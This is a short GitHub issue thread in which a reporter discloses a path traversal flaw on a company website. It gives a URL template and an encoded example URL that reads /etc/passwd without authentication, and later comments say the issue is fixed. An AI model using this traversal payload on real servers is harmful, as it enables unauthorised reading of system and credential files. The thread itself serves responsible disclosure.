### ISSUE TITLE
Security# Access server machine as root

### ISSUE THREAD

**Issue by 0xIslamTaha** [codescalers/www-codescalers#1]
Descriptions:-
Attacker can access all the ovcmaster files without any authentications using the following URL template
http://codescalers.com/wiki_gcb/.files/test/..\..\..\..\..\..\..\..\..\..\..\..\< FolderName > \ < FileName>

example:
Access the etc/passwd
http://codescalers.com/wiki_gcb/.files/test/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd

**Comment by lzonneke** [comment]
@davshafik can we update the website

**Comment by PeterNashaat** [comment]
issue is fixed
